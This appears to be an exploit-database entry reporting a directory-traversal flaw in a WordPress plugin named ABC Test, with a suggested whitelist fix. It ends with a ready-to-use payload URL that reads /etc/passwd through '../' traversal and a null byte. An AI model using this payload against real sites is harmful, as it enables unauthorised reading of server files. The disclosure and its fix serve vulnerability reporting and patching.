id: 19948
date: 12/12/2012
title: WordPress ABC Test Plugin directory traversal
author: Angel Injection
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] WordPress ABC Test Plugin directory traversal 
[-] Found by Angel Injection
[-] Version: N/A
[-] Security -::RISK: high
[-] platforms: php
[-] Download Link: http://downloads.wordpress.org/plugin/abc-test.0.1.zip

Xploit

Affected :abtest_admin.php

code
preferably amend line 4 of abtest_admin.php to include a switch statement ensuring $_GET['action'] is safe i.e.
switch ($_GET['action']) {
case “add_goal”:
case “add_ip_filter”:
..>8.. cut for space ..8<…
case “tabs”:
include ‘admin/’ . $_GET['action'] . ‘.php’;
break;
default:
echo “oh… something wrong…”;
}

http://target/blog/wp-content/plugins/abtest/abtest_admin.php?action=../../../../../../../etc/passwd%00

#  0day.today [2023-03-27]  #